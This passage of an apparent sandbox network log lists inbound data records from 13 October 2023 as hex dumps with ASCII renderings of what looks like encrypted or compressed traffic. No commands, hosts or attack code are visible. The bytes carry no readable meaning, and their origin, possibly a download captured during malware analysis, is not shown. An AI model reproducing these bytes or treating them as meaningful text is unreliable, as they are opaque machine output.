5b 95 95 73 8e 1f fd e3 73 3f f9 db 2e 86 28 a9 Data Ascii: &pyza]$QU8/#,#%iaQ`eoQ&/iw< )sCg9/2fyTU$RZ]edV/weoyL,,~`DS@4I6\rwRFa6U{N%`caE>6&WP2PG>lzeO\O3[ss?.(
2023-10-13 13:21:13 UTC	2936	IN	Data Raw: 94 91 d4 25 32 7c a4 fe 39 14 80 57 46 09 cc 1e f6 5e a8 f1 fa cb 84 9e 17 c8 9b 48 bc d0 3c 9c 7a 33 41 bf ab ef 08 e0 b7 22 8a fc 1e 5f b6 cf b9 0b f8 c8 16 77 66 25 29 ef 63 0f a3 a9 54 37 6b f3 7f 72 50 a0 d4 83 81 c0 51 ca 50 79 4d fa dc 9a 7a 01 98 b9 0c 24 ff cd 03 c9 7a c9 97 de d1 57 49 3c 2e d5 37 53 64 97 ae 99 07 6d e4 61 65 15 00 de d9 35 23 1f 1b 51 a7 8d 4e 1a 39 a3 0e 9b 1a 2f 34 d1 70 98 86 cf 87 08 ac 36 86 b2 6a 84 85 08 3b e2 7f 38 9e 61 1e 1f cd f2 77 95 56 f2 50 9e 0f 0f c4 b0 ae 61 58 82 3e 77 99 1a 1f ca 93 9d c7 b2 a8 a1 88 63 54 fc 28 c1 65 59 73 14 02 0b 19 22 fd da 47 1f 0f a6 92 91 47 e7 d7 20 0d 07 fa 11 35 b1 2f be ac 2d 5c 42 dc c6 9a 51 b2 01 46 bc d0 66 33 00 de 15 a6 14 2d 08 57 e8 91 29 d8 79 29 a9 11 35 40 3b ff 80 54 Data Ascii: %2\|9WF^H<z3A"_wf%)cT7krPQPyMz$zWI<.7Sdmae5#QN9/4p6j;8awVPaX>wcT(eYs"GG 5/-\BQFf3-W)y)5@;T
2023-10-13 13:21:13 UTC	2952	IN	Data Raw: cc c5 c4 62 89 cb 6a 7f b1 10 ee 80 f3 22 1a b6 3e c9 8c d2 b2 73 88 95 7b 8c e3 27 f7 e3 e0 bc 6b f5 43 e9 ff d9 c9 97 c9 77 a0 a4 ae 54 79 d3 06 db ce 36 57 57 f0 91 b5 c7 19 8e a4 46 91 75 2e c2 87 28 ad 0c 38 7a 8b ae 58 a3 fa 9a 9b a2 f9 ba dd b4 72 2c a3 94 38 22 3a c3 d2 8a 17 24 11 27 9c cc d9 09 44 0b b2 90 d3 24 6d 63 48 12 ee 89 b7 28 40 21 de 13 7a e3 8e 21 6d f8 51 ae ca c9 d2 83 70 29 21 56 cf 94 47 1f 71 3d 88 cf 1e b4 ad ab 31 12 fd 51 a5 dd 54 b3 78 fb d9 b6 4f 9c b7 1e fa cb 22 54 3e c7 7b 7e bd 5d 4a fd 72 cb 9c 4f 4b 78 fe df 41 60 47 e4 e7 3c 8c 9d b6 f3 a5 e3 c9 2f d8 bf a0 5a c9 bc 34 e8 9c a6 df 84 be 88 ef 1e bb cd cc 3c e5 d9 d4 33 eb ab 79 63 48 80 b5 75 43 73 f3 54 8a d1 c3 d5 f9 a0 51 d7 45 49 86 f2 ed 98 52 b9 8c 21 58 a2 ce Data Ascii: bj">s{'kCwTy6WWFu.(8zXr,8":$'D$mcH(@!z!mQp)!VGq=1QTxO"T>{~]JrOKxA`G</Z4<3ycHuCsTQEIR!X
2023-10-13 13:21:13 UTC	2968	IN	Data Raw: 16 df b8 d3 7a 52 fd fe fb 66 e8 b2 db 83 7c 25 19 10 a2 41 e4 da 4a c5 2b 6c 1e e9 cc e3 6c 55 4f fe 09 d7 1a aa b8 f4 b2 b4 6f a2 e4 3b ff 97 2f 01 a8 28 8b a5 7e 9e ef 39 51 0e 26 6d 27 94 39 6f a0 51 85 c6 9a d6 7e c2 43 eb 57 8d fd c1 09 34 f9 ee 42 f4 2d 4c 32 41 14 ab e7 8b 54 5c 3d ad 09 64 ff 18 9f 3e 40 cd e5 ca cf c2 fa 6a df 03 93 91 46 75 63 0e 99 fc c7 f8 12 74 14 b9 be 79 53 ba 41 8d f4 f2 92 f3 ea 0b bf da 43 8f a6 2f 5f b6 18 e2 ba a3 6a bf ff 43 9d 80 e5 1b 24 c6 20 1b 96 be 1c 1b 64 4c 29 8e db dc 5c e7 a4 e0 2f 36 7d 51 4e 23 a1 74 79 ca e8 d3 74 b4 9d 0a 06 26 25 cf e2 29 6c da f8 4c cb df 1e 64 3f 8f ff 2c 41 86 ad a5 02 0c 0f 7d 1f 05 9b 95 f9 65 2b d0 1d dc 12 e0 83 22 69 b5 8d 3b 7a 9d da 51 9a 8b ea 08 47 3d e7 95 6c 54 dc a2 f2 Data Ascii: zRf\|%AJ+llUOo;/(~9Q&m'9oQ~CW4B-L2AT\=d>@jFuctySAC/_jC$ dL)\/6}QN#tyt&%)lLd?,A}e+"i;zQG=lT
2023-10-13 13:21:13 UTC	2984	IN	Data Raw: ac cd 33 0d 0d 63 3c 53 28 bf 83 3e 06 b9 4e 46 8f 4d 64 2f 07 80 46 43 b5 84 fb 02 ad 35 f5 1c bf ec d0 77 06 a7 66 9b 94 4e 65 7f f0 1c 91 b1 81 f7 0b 11 3e fc 98 a4 33 80 e2 66 40 fd fa d8 dc ce 5e f9 67 e8 d3 fa 3d 58 02 e8 4b 4f df f9 f2 fe 30 5b 6a ef 68 9c 55 8e 1f 6a ab 81 42 0b 5a 52 7d 22 2f 8b 9d f4 85 b7 af 6b bf ec dc 3f 9c bd b4 97 51 0a ae a4 04 0d 4c 88 c1 bd fa 66 ad 5f 86 b8 94 83 47 00 dd 22 3d d7 ba 33 23 b0 bf 1e 44 e2 ce be f8 20 ef 79 34 55 87 57 8f 19 9e c9 24 6b ed 0c 98 ab de 20 77 87 c0 3b c8 01 48 41 ec 4d 2e 1e 3f bc ad 0e 22 db 0e 6c 7f 58 06 34 7b d1 5e 5f d1 8c d6 39 73 0f 4d d7 cd 73 47 b2 f2 8c af bf 01 1f e5 5a c9 c2 10 b7 cb e9 d9 c8 6d 71 84 ae 50 be dd c7 a1 56 f5 0f d6 a7 be 3f 80 2f d4 36 56 fd 6e e4 37 ef 25 52 e2 Data Ascii: 3c<S(>NFMd/FC5wfNe>3f@^g=XKO0[jhUjBZR}"/k?QLf_G"=3#D y4UW$k w;HAM.?"lX4{^_9sMsGZmqPV?/6Vn7%R
2023-10-13 13:21:13 UTC	3000	IN	Data Raw: 69 72 ed 66 a1 68 46 5a ea 2c 1d 16 69 2c c8 15 ab 3b df 36 3b f6 02 41 6d 8b d6 ef 71 90 91 36 47 c0 34 8d ec b0 3c f9 d2 4b 7c 20 30 0d 20 2b da 8e 15 d7 6e 6b ac 57 d2 62 53 88 0a 42 3d 30 33 c3 20 cd 3e a6 47 28 7e 5b 03 65 d0 c6 b6 4c 11 5d 0b 67 a5 a6 18 d0 92 ea c3 3e 5f 14 60 6f 05 42 60 e8 85 1e 25 bf 0d 30 41 a3 11 b7 0c 21 8d 56 4c 3f d0 eb d9 bf 57 42 b5 b9 f5 c6 c6 67 2f 3c 62 08 ea 63 61 9a f7 18 08 59 8f 8b 32 77 39 a0 26 f2 3f db 1e 93 d8 4e 23 43 b7 e0 98 55 2e 3f c4 74 cb e0 2c a6 1c bf af 5f d8 b3 a4 cf 16 82 73 1a ce d3 d2 f9 8f ad 63 f7 ab 9a 56 40 2f 16 18 e2 f4 4e 10 06 22 3f 91 f9 5c db 4f 0b c4 c0 94 89 93 31 0d 62 5f 9a fc 64 16 4a 98 36 83 28 a0 85 10 04 ca 81 19 31 d1 07 d5 b2 75 3e bf 61 6d 8b b9 83 a1 46 b8 43 a4 91 c1 da 93 Data Ascii: irfhFZ,i,;6;Amq6G4<K\| 0 +nkWbSB=03 >G(~[eL]g>_`oB`%0A!VL?WBg/<bcaY2w9&?N#CU.?t,_scV@/N"?\O1b_dJ6(1u>amFC
2023-10-13 13:21:13 UTC	3016	IN	Data Raw: 36 e9 27 69 8a 0a db 0b c9 62 b7 bd d2 b4 4a e8 e3 21 29 a8 c7 85 97 6d 20 50 d9 af df 71 47 bd 46 ec 2d 1a 05 37 0a ac 8e 60 7e 41 f8 5d 4a 01 9b 06 92 e9 cb b5 ed b3 5e a8 5a 88 fb 4e c9 e6 89 ea e1 b5 69 05 2d bb 2b d1 0e 34 a2 8a 80 be 6b 9f b4 36 e1 c2 77 30 59 01 21 e4 c6 11 c1 96 aa fd a7 84 dd 27 6c 27 cd 3b 64 9a c2 f3 b4 18 70 f6 48 34 0d 76 f4 f5 c8 2d d7 4b ce 63 10 8a 05 d0 05 70 0e 46 b7 02 03 71 8e 01 64 68 19 5f 1c 8e 3f 21 45 50 c6 09 a3 eb 45 5b 69 99 2b d4 9a ab 85 b4 06 9d 61 90 7d b8 76 da 12 d3 d9 50 cf 7c 73 94 76 39 45 64 e9 ea 01 c9 ff c5 ba c1 12 c8 95 6f 96 3d f2 14 a3 9b b8 7b 1b 5e ea 79 5a 7d bf 54 2b 69 b6 ac 00 12 0c d2 fa 9c 00 68 2b f2 06 00 a5 62 1f 52 47 1a 0d bf a6 31 c8 22 78 59 23 20 b4 0e 06 88 98 bb 21 43 f7 d5 3d Data Ascii: 6'ibJ!)m PqGF-7`~A]J^ZNi-+4k6w0Y!'l';dpH4v-KcpFqdh_?!EPE[i+a}vP\|sv9Edo={^yZ}T+ih+bRG1"xY# !C=
2023-10-13 13:21:13 UTC	3032	IN	Data Raw: 8d 98 3b ef 74 e3 0e 8b b7 9c 78 dc 62 67 c9 2d a8 2d a0 eb e5 84 66 b8 1f 4f 28 f9 23 33 82 23 80 a6 1e 91 f1 63 f1 0b 32 32 31 7c cb c2 f7 c3 09 0e f3 d6 28 c8 a4 b2 1f 44 b0 aa cc 0f 66 2d c5 11 54 f4 fd 75 40 9b 01 73 06 fb eb 4d 7a 06 5d af 50 18 10 14 8d b2 17 fc 33 a1 d1 84 f6 3d d8 91 78 69 6a f2 14 da b1 64 cb f9 1b 27 aa 00 8c 66 5d 62 d9 e2 ad cd 48 cf f7 73 70 2d dd 86 63 86 50 15 7f 35 28 6a 49 fb 30 6c cd 6c 61 c4 f7 83 10 9f 12 39 75 94 d2 9f 86 7e 72 e9 ea 36 98 37 89 5e 5d c6 42 d6 4f 43 7e e2 96 03 ed c0 7d aa 31 fe 09 e4 9f 4c f4 a1 34 49 f2 d2 27 0e 58 66 be d2 ee 10 ba a3 8d 48 d3 1f 22 b0 8e 97 89 72 96 bc 3f da b8 b9 61 2f 23 cd 01 85 1b cb bf 27 a2 cc b2 12 87 cf 31 9c e0 be 4e 3b 01 52 df bf 21 b0 4d ce eb 09 b9 fd 9c 8a fa 48 8e Data Ascii: ;txbg--fO(#3#c221\|(Df-Tu@sMz]P3=xijd'f]bHsp-cP5(jI0lla9u~r67^]BOC~}1L4I'XfH"r?a/#'1N;R!MH
2023-10-13 13:21:13 UTC	3048	IN	Data Raw: bb e2 5c d1 32 cd b3 40 45 2e db 50 34 c4 49 ea 80 ed 7d f3 15 6f 04 6f a7 a9 65 72 5f 00 dd 54 f9 a9 d8 7c 4f ef 8f 37 d9 8d c8 b1 bb 57 53 1c 05 93 12 6e 0d d9 53 7e 81 aa 6f ff 5c e1 83 6e c1 b9 dc 36 42 b8 f3 f2 d1 61 ab 34 f1 ce 10 0e e1 fd a0 14 b7 15 37 e1 aa 10 a7 7c e4 b0 dc 65 53 7c 4e f1 72 a7 b2 6d 55 bf 0b a9 04 af ac 55 02 58 c7 e6 63 50 0c ac a2 d8 d5 9f 8a ab c1 af 21 35 8a 5e 2e ec 6a cf 37 20 dd 4f f9 c6 79 73 0f 57 cd 8e b2 d9 dd a4 15 b1 a3 8a 71 21 b5 39 84 b5 a6 ff d4 79 c6 34 bb 8d 2b 8c 1f 51 1f e7 76 07 c6 7d e6 1e e7 20 0c a2 3f 1f a6 95 89 22 d1 59 aa 31 70 30 b1 39 4b 92 80 ca ba 06 6a 24 84 7e 17 15 9f 30 86 9f 8f 57 80 29 60 a6 24 a3 40 91 10 0b 73 a5 0a 02 69 e6 13 f4 26 c6 d5 48 bf ce bc c4 9f 56 cb 10 de 3d a1 59 81 7d 42 Data Ascii: \2@E.P4I}ooer_T\|O7WSnS~o\n6Ba47\|eS\|NrmUUXcP!5^.j7 OysWq!9y4+Qv} ?"Y1p09Kj$~0W)`$@si&HV=Y}B
2023-10-13 13:21:13 UTC	3064	IN	Data Raw: 13 f0 bd 10 7d 1c d2 78 3f a2 5c cf b5 ef 96 62 27 3b 67 b8 4f 19 96 1f 6a db 96 58 cb 88 1d e4 1f ee 75 c8 b0 15 f2 bf 76 36 82 b5 4a 6e 9d 35 10 25 2c 56 ea 5f c1 47 55 23 74 16 3c ef 4f 51 a0 f2 6b 6b c8 44 92 70 99 3e 81 db d3 cf 44 8e ca b8 ad e9 96 b8 d5 f3 e9 5e c9 49 0f 7a 85 1b 98 f7 66 4f 8d 92 c3 96 7c 36 53 e2 27 54 26 6e 7b 63 4e e6 14 ab 48 01 68 58 e8 20 81 c7 06 8f af fa f4 aa b5 73 1b c9 df 21 20 9a 91 53 a2 f2 9c d0 e9 58 ae 5e bd 86 92 39 95 32 1c 65 b5 69 93 1c 67 5a 04 f4 99 66 d6 d2 f0 27 98 ea 9b 69 25 66 1c 71 83 80 f3 0a 98 f0 cd f5 bc ba 07 7c 17 7f fb 9e d9 0c 26 1d 8c b2 19 f8 1a ed d5 ea 4e 86 e1 36 14 d6 9f 6e fb 8b 47 47 3c 71 d8 95 44 d2 2d 9b bd 47 ca b2 8a eb 30 06 4a df c4 c7 e3 e1 50 a0 59 fc bd e0 70 22 7f 4d e4 da ea Data Ascii: }x?\b';gOjXuv6Jn5%,V_GU#t<OQkkDp>D^IzfO\|6S'T&n{cNHhX s! SX^92eigZf'i%fq\|&N6nGG<qD-G0JPYp"M
2023-10-13 13:21:13 UTC	3080	IN	Data Raw: 87 1f e9 13 19 76 4c 70 e2 80 1c bf 7d f7 f9 1d 9a b5 7f 10 f4 87 0e 12 08 32 35 0a cd b5 f9 60 8b af 85 8e fc cf 3d 5f 55 7a eb e4 af e6 96 42 e9 cb 08 56 64 6a df e3 aa 5d 2a 7c 54 34 c8 95 62 ef f0 74 27 50 97 ce 0c 26 04 f0 e2 32 58 3e 5a d6 6a d4 dc 4c b9 46 11 73 c5 6c 15 d6 07 a5 9d d7 e3 ad 5e 1b 27 3e 2e e4 03 2b 20 1c 31 db 00 ce 62 48 fb bd b5 45 1e 10 4f 81 c0 0d 51 49 26 76 7b 46 56 88 8b 9f a5 01 46 2a 6a 1d 6f 62 a0 2a 1a b4 c7 1d 8d de 23 67 cf d5 03 73 55 5a 78 40 45 57 4c b7 ee 1e 2a 26 a6 ba e0 0f 6b 08 93 67 e1 6d 77 77 ef 58 4e 66 36 a2 5e 50 de b3 24 a8 82 86 2e 6f 5d 1b 46 61 9f 98 72 45 f0 4e 9a c5 0e b3 07 92 2a 0f 5e ca 08 6b 45 36 69 09 5d 92 ba b0 88 ae ce dc c9 e1 66 72 74 3b bb 8e ee 60 00 aa d2 4b c3 0c 0a 90 b7 c2 4b 68 29 Data Ascii: vLp}25`=_UzBVdj]\|T4bt'P&2X>ZjLFsl^'>.+ 1bHEOQI&v{FVFjob#gsUZx@EWL&kgmwwXNf6^P$.o]FarEN*^kE6i]frt;`KKh)
2023-10-13 13:21:13 UTC	3096	IN	Data Raw: 8c c7 e9 37 6a 52 22 34 96 57 9f ce 29 56 ec 3a e4 c3 58 99 3b 4f 1b 6d 9d 4e b5 63 fc 0a cd da ca 2a e6 b6 ce 38 a9 28 7d 45 dd a7 78 1c a3 d6 3b 2e 1a 99 76 5a f8 c4 75 fd 9c e4 48 c8 19 e7 16 98 6b 98 0f 1e 6e fc e9 e5 0d 10 ba 0b 42 a0 12 1d e8 8a 90 ea 1d 91 c4 cd 14 d0 cc ab 97 a1 8e 4b 09 aa 4f be c3 06 d3 d8 fc 58 26 04 c6 f0 d5 4d 82 78 dd 85 40 a3 d0 a5 c8 bf e5 34 a6 69 6d 30 71 e2 17 99 f3 ff d2 60 dc e5 32 39 8b 83 b4 3d 45 ce d4 d5 1c 5e 05 f5 1a b1 ca 15 ec a0 ed 11 d6 db 26 2a f1 bd b3 ff 3e 0e 1b 25 42 e8 67 0c b8 51 d4 39 46 1a 4e 31 b9 c2 07 c8 b6 e6 ba d8 88 4d d9 ff 19 c5 09 fe f0 2d de b9 17 0d d0 13 c6 8d df 34 e0 95 62 0e 7d 01 39 07 88 57 bf 4c 8c df 1f 96 36 38 08 97 4c 22 e6 e8 96 11 1d 10 56 33 e6 f7 fe f8 fb 34 eb 9d 96 76 e6 Data Ascii: 7jR"4W)V:X;OmNc8(}Ex;.vZuHknBKOX&Mx@4im0q`29=E^&>%BgQ9FN1M-4b}9WL68L"V34v
2023-10-13 13:21:13 UTC	3112	IN	Data Raw: f3 e3 14 25 66 a3 6c e6 24 13 70 a0 98 b2 bb b6 c0 af 32 70 f4 d0 cb 1b fe a0 a5 3b 01 8b cd 0d 2e 4a 3e 0f 47 db cc 17 f8 99 f0 c4 06 4e 8c 35 20 45 1a 5d 78 84 de 08 d5 f8 b8 dc bb 58 e9 4b 3b 6c b0 7b 3e 5a 75 55 74 c0 17 a5 0f 6a 33 61 b2 98 44 be 7c b3 61 d5 39 25 35 40 ce 50 d7 02 11 cb 37 8a a7 fa fd 1c 19 8e 8a 53 5c ce bb 90 46 ee 43 77 fa 00 69 05 30 81 3a 52 87 b7 88 f9 73 2c 69 ed 9a 36 b3 08 6b 93 4a de dd 8b 31 8e 77 7d ef 5d b8 2c a9 05 b2 45 cf 7d 1a 85 03 ea 16 8f 9a 07 ae af 99 1a e2 51 ef 8a ec 32 32 0e 78 84 d6 cc 2f c1 2e a0 b8 f5 7e e1 8f 7b f6 ed d0 f7 78 b9 f2 c1 82 7f 3a 7b e9 fd 49 91 df 63 25 2e b2 27 56 f4 d3 9f 04 c9 71 87 cd 31 98 74 8f 60 67 06 ef 2b 5d 0b 09 f0 9d ec a2 33 8a 89 b9 20 d2 8d 45 8a ae fb 33 49 8b 8b 3d c4 5b Data Ascii: %fl$p2p;.J>GN5 E]xXK;l{>ZuUtj3aD\|a9%5@P7S\FCwi0:Rs,i6kJ1w}],E}Q22x/.~{x:{Ic%.'Vq1t`g+]3 E3I=[
2023-10-13 13:21:13 UTC	3128	IN	Data Raw: 2a 5b e7 99 87 7b c3 83 a6 e8 64 a7 89 f0 7e 28 93 24 2f 7a 94 8c 84 4c c3 7d 2f 30 25 50 d8 0b cb d1 87 91 f8 f5 36 8b 04 3c e2 af cc 85 a7 e1 40 d8 8f 3f 69 28 02 4d 68 bd 9c cd 77 75 b4 94 a9 f4 96 11 de 3f fa c9 ca d2 43 1a 5f 9a 89 20 87 c7 3d 31 0f 6b ae ae f2 44 01 e5 20 7e 27 05 0c 27 21 fd 08 ba 2c 41 b7 15 9f dc 5d 7e 4c ba f1 8f ce b9 64 4b d0 e2 9c 74 14 ea 3b 17 2f 65 13 5f 9e 67 ad 4c 79 1b 41 3e b4 1e c5 e9 2a dd 74 23 c8 cc f7 3e c3 8e f5 36 cd 24 fb 4f 1c e4 40 81 09 14 dc 9e 8f 8a 88 c7 7c 17 5d 8c 35 32 34 4a 8a b5 4e 2b 76 db ac 3d 43 2f 58 cd 9a 24 f7 d3 53 a7 0a ce 50 3b 92 cf c2 16 49 e7 cd 96 fd 1b 49 68 3f c9 b6 2c ac 80 40 89 3b 13 19 76 f9 6c 7f 72 64 4e 54 e8 46 e2 7e 2f 10 21 a4 8a 4f e3 f0 e0 0c df af c2 f4 d9 85 f2 2a e1 33 Data Ascii: [{d~($/zL}/0%P6<@?i(Mhwu?C_ =1kD ~''!,A]~LdKt;/e_gLyA>t#>6$O@\|]524JN+v=C/X$SP;IIh?,@;vlrdNTF~/!O*3
2023-10-13 13:21:13 UTC	3144	IN	Data Raw: b2 cc 15 75 95 76 42 c3 67 8d 31 2a a7 75 fb e6 29 1e 3e 10 d6 11 6e 8b a1 53 0c e0 55 f2 e9 8d b3 f3 b6 40 54 36 17 29 b2 43 aa 5f a2 bb 27 76 90 39 50 3f e8 fd 34 31 f0 7e c5 20 80 77 43 31 1a 77 6a 2a 32 ca ff f7 05 e2 d9 28 6c 35 37 27 15 b8 70 84 f0 0b 1a f3 df 63 0a 45 d5 0f f9 6a fc 3a 2b fe a3 21 e9 df 1f a5 22 41 97 3d 8e 61 72 71 68 a5 90 a5 d4 e1 7f 50 0c 51 8d 3e 71 56 06 f0 3b cd 67 44 b9 d3 80 68 b0 af a7 27 1d be 95 50 ae 55 19 c4 74 83 b7 d0 ee 81 be 85 2a 6f 44 91 ab d3 c9 a4 18 41 f0 a5 d4 d0 84 37 3f cc 8b e2 37 b2 3a af d1 cb fb 33 c1 9a 7b 02 0b f5 56 40 1a fb 64 f9 31 c7 5d cf 99 78 dd f0 47 3a b3 cd bb 82 cb d9 56 e5 ea fa b7 74 72 7c bf 1c 72 a8 b6 72 7d 62 24 d1 ef 0e a0 00 79 2c fd ce 40 d6 7a 08 6b 87 41 5a 80 f4 ac 19 62 91 77 Data Ascii: uvBg1u)>nSU@T6)C_'v9P?41~ wC1wj2(l57'pcEj:+!"A=arqhPQ>qV;gDh'PUt*oDA7?7:3{V@d1]xG:Vtr\|rr}b$y,@zkAZbw
2023-10-13 13:21:13 UTC	3160	IN	Data Raw: 73 f0 0a 75 79 9d 3e ba 23 52 81 ce 57 33 19 f4 8a a6 a5 f8 7c 92 46 64 b7 7d 34 2d 5f 52 4a 1f ed c1 5d 84 13 25 cb de 9e e9 08 77 75 2e e9 4d 26 ef 4a 8a 69 36 16 2d 9c 67 be f7 87 f5 a4 98 68 35 f3 19 e4 68 88 9e b2 63 d2 ca ce e4 fa d3 21 ec 3d 65 5f 54 23 69 cb 7b b2 3e 99 3a 3f db 44 64 5d a0 93 75 73 58 09 2c 7b f8 79 33 ef bf 8a cd 52 f3 36 b8 e5 a2 6d b0 37 42 d6 4b 4d f1 3e 41 1f f5 b9 95 d7 62 1c c8 59 0f be 56 17 5f f5 82 0a eb 58 8b e6 67 b3 60 76 9f 43 71 26 27 bc 45 e7 7e 2b 15 b7 a5 84 b9 ea 52 82 fa ba 06 41 ba 29 4f b1 99 e1 06 ed 8f 9c fe be 60 b4 a6 27 da de 56 5f 55 90 9c bd 69 33 58 92 3c 8a 94 2f eb 94 03 46 82 bb 84 8c 74 ed 95 77 8f ed dc 19 26 f2 a0 3d e5 95 cc a1 88 b4 d8 bd 8d 84 e5 dc 19 d7 e4 9f 00 0e fb 77 da e4 8b 38 01 0a Data Ascii: suy>#RW3\|Fd}4-_RJ]%wu.M&Ji6-gh5hc!=e_T#i{>:?Dd]usX,{y3R6m7BKM>AbYV_Xg`vCq&'E~+RA)O`'V_Ui3X</Ftw&=w8
2023-10-13 13:21:13 UTC	3176	IN	Data Raw: 10 a0 17 b5 8d 5f ac 6f 3e 17 5b 81 7c 26 86 ce 4e 6d 50 22 5a f1 f7 71 d7 ff 85 25 76 d5 ec 0d 1c 95 04 f7 79 d2 72 e5 46 88 fd 91 ab c9 a8 76 b2 09 44 91 e0 73 55 a2 c3 33 ed bf 3d 95 5e 44 92 50 06 ad 42 60 f7 91 0f 99 df b8 59 3c 01 a6 64 76 9f bb 1d 9d 0b d7 23 8b dc 81 27 a3 93 d5 66 a4 65 07 3f 5e 3a af 42 2f 47 e4 89 e6 1e 89 82 ae 70 c5 9a b3 ad 47 46 f9 b3 5a d7 f3 6c ec 66 1f 50 a7 0f 23 84 8e 56 05 fc 30 ea f7 68 f4 13 09 86 97 70 e3 54 b7 d7 be 18 ec 15 70 19 65 61 48 c0 dd 30 57 67 b6 85 b8 94 70 89 f7 18 f4 b7 93 22 ce 3f 1d 86 31 f5 76 41 35 98 dd 10 d4 c1 40 e4 f7 f7 ec b4 0b 52 a7 5c 0c 23 c7 04 53 4c 6b 1f 8d 8e f1 85 b3 a6 5d 7c e2 ed b1 d5 31 a3 90 6b e6 e6 23 cc 0d bf 63 6f de 79 ac 0e d3 c5 8d 91 11 7d 1d 64 65 9d 18 fc 22 ed b9 5a Data Ascii: _o>[\|&NmP"Zq%vyrFvDsU3=^DPB`Y<dv#'fe?^:B/GpGFZlfP#V0hpTpeaH0Wgp"?1vA5@R\#SLk]\|1k#coy}de"Z
2023-10-13 13:21:13 UTC	3192	IN	Data Raw: 59 08 fb 4d 04 bf 05 f0 f6 26 76 61 52 8c 26 84 18 75 20 b8 fb 2c 1f 29 ca 2e 91 36 64 c2 2e c0 3c ec 8d 1a 3a 01 d4 bc fb b3 fe 7d 00 bc 71 98 b0 0b c2 2e d1 ef 53 35 e7 34 f2 b9 f9 f4 ae 57 55 ef 63 1b f5 16 89 c2 4c 2c 7e 07 61 5c c8 95 65 a8 61 f8 f8 45 f2 c9 31 3e a3 1f 47 6c ff 14 b9 f6 2d 01 c2 e2 11 8a 43 11 e8 50 88 67 02 19 c8 20 f1 7c 34 28 bc 87 43 74 82 07 a0 08 68 5e b7 ca 78 3d 11 f3 9e 31 0d 1a a5 90 8f 73 61 b7 39 b6 ba c8 e7 f8 3f ee 2b ae 96 e8 0d 8f 23 aa 9d 81 d6 40 5a 14 64 33 79 c3 4e 78 76 8e bc 78 aa e2 6d 5f 8b 4d cf 82 aa c5 c3 71 b4 b5 48 ff f8 44 7f 26 17 b4 ec a6 b8 51 99 e9 53 53 6b f8 aa 9a db 82 ca b8 03 1d 11 a5 33 dc 3d 52 97 e1 dc 7b 3e 2a 36 d2 43 81 38 7b 11 97 93 21 8a 5b 61 b8 34 7c 36 04 c8 33 f0 cb 55 0c f6 ae 97 Data Ascii: YM&vaR&u ,).6d.<:}q.S54WUcL,~a\eaE1>Gl-CPg \|4(Cth^x=1sa9?+#@Zd3yNxvxm_MqHD&QSSk3=R{>*6C8{![a4\|63U
2023-10-13 13:21:13 UTC	3208	IN	Data Raw: 4f 3e 6a 34 97 ee 64 18 82 79 6b eb df 2d 90 2f 80 bf fc 9a 85 ba 15 8b 8a dc b3 48 7b a2 c8 a0 e6 36 1e 31 5c ba d9 e8 80 69 dd ba f4 3a e5 7d d2 30 93 d0 9c 1c 9c 95 4d 17 ba 5c b5 8e 06 f2 4c f3 57 31 f6 3b 31 a8 5c c8 b9 a6 d0 5e 5f 36 93 db eb b3 97 0b 94 4b 11 08 7e 87 e0 b7 ad d6 8a f7 6d 24 83 a0 48 2c 16 76 86 59 f5 97 1c 6f 38 9f 16 f7 80 39 62 ea ca 33 28 4d 8e d9 53 5d be 88 8b 80 d2 06 5d 80 7e 71 b7 44 8e a8 76 ec df dd 59 48 e5 c6 fe 97 e1 66 09 6c 9e 44 3e f9 98 25 d9 19 28 e3 bc 69 8b 95 71 74 41 69 fd 1c 3a 4b d0 96 f5 48 4b 8b 7c 4e df 1b 4d c0 86 50 bb b9 89 6e 35 3e a1 ab c6 2a 76 bc c9 75 51 d9 a2 69 1f 7a b6 f3 0a 71 e0 3c e2 06 02 03 6c 77 3e 37 df e3 b1 46 60 37 3f 78 d7 6c 2c 2c 7c ab 1c 2c f8 84 2e e0 fa eb 48 6e c1 ad 7b d4 31 Data Ascii: O>j4dyk-/H{61\i:}0M\LW1;1\^_6K~m$H,vYo89b3(MS]]~qDvYHflD>%(iqtAi:KHK\|NMPn5>*vuQizq<lw>7F`7?xl,,\|,.Hn{1
2023-10-13 13:21:13 UTC	3224	IN	Data Raw: 59 c8 a1 70 dc 32 d6 c3 28 a7 bb 7f 10 cb 44 a1 6e 8a ef 26 4c d6 bd e4 b5 e3 c5 0d d1 c4 13 e9 32 17 ed c0 30 41 e8 11 e3 c3 7e 1c 3b b9 26 16 a5 af bf 98 cd e2 dd a5 e8 ec de 44 21 a8 6a 45 f2 e2 e0 4b 6b b8 49 7e cf 80 53 5d 5e 95 77 77 c3 06 90 f4 b7 65 18 f2 c0 81 f5 2a 34 43 7d d2 8a b5 fa b9 e3 2f 12 86 92 43 ea 55 60 48 30 47 0b 3d 95 75 ab b0 d4 25 b2 b3 a2 c7 bd 20 55 87 9a b2 a6 28 bf 78 eb 46 a6 75 34 b1 d6 c2 27 1d fd f4 15 c0 48 dc 2a 8c 64 7d 39 8e eb 75 ad 89 c4 99 a9 86 61 8b 9b 67 f2 a1 4e f2 5e d5 5e 9f 32 14 22 11 8c 26 36 3a 71 71 2c e1 11 78 35 04 02 41 d2 ad 59 7b 39 b1 62 64 e7 a4 06 7d da 84 70 79 a2 6a 53 70 2c 45 4f ec c0 5b 66 71 10 00 ed bd fc b5 c4 50 be a9 ed 0f 76 73 b2 91 20 09 4a ec 3b 9e 6a a6 e7 f5 85 b1 44 bd e7 5c 1c Data Ascii: Yp2(Dn&L20A~;&D!jEKkI~S]^wwe4C}/CU`H0G=u% U(xFu4'Hd}9uagN^^2"&6:qq,x5AY{9bd}pyjSp,EO[fqPvs J;jD\
2023-10-13 13:21:13 UTC	3240	IN	Data Raw: 79 ae d7 f9 82 e3 b0 b5 69 f0 9f cb 36 b2 6d a8 26 cb fa b0 45 a8 e8 4e a0 c4 1a fd d8 49 56 fe c5 8f 57 2d 5a 8d f2 d3 6e bb 4a c2 a1 52 62 28 dd 75 e0 3e 7e af e3 21 dc e1 50 95 d9 5f d7 ab db 55 c1 52 75 50 b8 64 c1 04 b8 7a de d5 84 a0 c6 75 ab f3 9d 39 4c d1 a2 d6 7e e5 c1 31 06 00 89 8a 3d 85 0d 20 2e 71 b9 58 3c a4 4a 88 c5 f9 b8 f5 64 e9 9c c7 d5 52 2d 98 15 bb 51 f7 2f 29 be 4a ca 60 49 69 a8 7c b0 58 27 ae 72 86 8e e9 78 fd 31 d9 96 1a c8 3d 00 e4 a5 15 5f 8d 41 5e 23 0c 25 39 ea ae 90 2a 04 8b 76 d3 8f e7 df 90 f2 75 a5 dd a0 0e a1 96 bd 16 18 8a d6 eb 41 49 62 ed bd bd c1 73 d3 07 c4 